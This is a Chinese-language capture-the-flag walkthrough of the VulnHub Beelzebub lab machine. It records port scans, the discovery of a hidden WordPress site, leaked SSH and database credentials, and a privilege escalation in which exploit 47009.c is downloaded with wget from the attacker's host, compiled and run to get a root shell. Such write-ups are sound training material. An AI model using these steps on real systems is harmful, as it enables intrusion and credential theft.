打靶记录(一六四)之VulnHubBeelzebub

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub/beelzhub]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 20:21 HKT
Nmap scan report for 192.168.56.105
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:8C:C2:E1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds

┌──(mikannse㉿kali)-[~/vulnhub/beelzhub]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 20:21 HKT
Nmap scan report for 192.168.56.105
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:8C:C2:E1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (99%), Linux 5.0 - 5.4 (97%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds

Getshell

访问80，一个apache的默认界面，扫目录有一个phpmyadmin,尝试了一些弱口令之后无果

发现在index.php中有一行注释:

尝试md5加密，得到:

┌──(mikannse㉿kali)-[~/vulnhub/beelzhub]
└─$ echo -n "beelzebub" |md5sum
d18e1e22becbd915b45e0e655429d487  -

拼接到目录后面使用dirsearch能够扫描出一个wordpress站点，但是我一开始用了gobuster和feroxbuster都无法访问不知为何

通过wpscan能够枚举出一个用户名krampus,然后在wp-content/uploads/Talk To VALAK/index.php页面，能够与其进行交互，在返回包中设置了cookie Password=M4k3Ad3a1

但是这里环境一直有问题，稍微开一下扫描器服务器就崩溃了，于是直接跳到user,ssh能够登录

wp-config.php找到

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'P0k3M0n' );

但是枚举了一下数据库之后没有结果，发现家目录的用户历史命令里面有一个

mv 47009 ./exploit.c
gcc exploit.c -o exploit

提权

上传这个exp至靶机编译，一把梭

krampus@beelzebub:/tmp$ wget http://192.168.56.102/47009.c
--2024-10-13 18:43:07--  http://192.168.56.102/47009.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 588 [text/x-csrc]
Saving to: ‘47009.c’

47009.c                   100%[==================================>]     588  --.-KB/s    in 0s      

2024-10-13 18:43:07 (13.7 MB/s) - ‘47009.c’ saved [588/588]

krampus@beelzebub:/tmp$ gcc 47009.c -o pwn
krampus@beelzebub:/tmp$ chmod +x pwn
krampus@beelzebub:/tmp$ ./pwn
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)
opening root shell
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)

碎碎念

房间质量不咋地，打的时候网络一直有些问题，还喜欢藏东西